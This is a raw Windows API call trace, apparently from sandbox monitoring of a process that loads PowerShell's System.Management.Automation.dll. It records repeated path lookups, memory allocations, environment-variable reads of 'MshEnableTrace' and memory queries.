	[0236.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.760] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0236.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0236.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.789] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0237.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0237.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0237.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0237.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0237.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0237.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0237.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0237.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0237.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0237.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0237.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0237.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0237.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0237.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0237.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0237.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0237.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0238.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0247.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0247.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0247.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0247.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0247.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0247.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0247.163] VirtualQuery (in: lpAddress=0x27b710, lpBuffer=0x27c5d0, dwLength=0x30 | out: lpBuffer=0x27c5d0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0247.167] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0247.167] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0247.167] CoTaskMemFree (pv=0x506ba0) 
	[0247.176] VirtualQuery (in: lpAddress=0x27b710, lpBuffer=0x27c5d0, dwLength=0x30 | out: lpBuffer=0x27c5d0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0247.281] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0247.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0247.281] CoTaskMemFree (pv=0x506ba0) 
	[0247.284] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0247.284] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0247.284] CoTaskMemFree (pv=0x506ba0) 
	[0247.287] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0247.287] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0247.287] CoTaskMemFree (pv=0x506ba0) 
	[0247.292] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0247.293] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0247.293] CoTaskMemFree (pv=0x506ba0) 
	[0247.297] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0247.297] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0247.297] CoTaskMemFree (pv=0x506ba0) 
	[0247.300] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0247.300] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0247.300] CoTaskMemFree (pv=0x506ba0) 
	[0247.307] VirtualQuery (in: lpAddress=0x27b710, lpBuffer=0x27c5d0, dwLength=0x30 | out: lpBuffer=0x27c5d0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0247.473] VirtualQuery (in: lpAddress=0x27b710, lpBuffer=0x27c5d0, dwLength=0x30 | out: lpBuffer=0x27c5d0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0249.722] VirtualQuery (in: lpAddress=0x27b710, lpBuffer=0x27c5d0, dwLength=0x30 | out: lpBuffer=0x27c5d0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
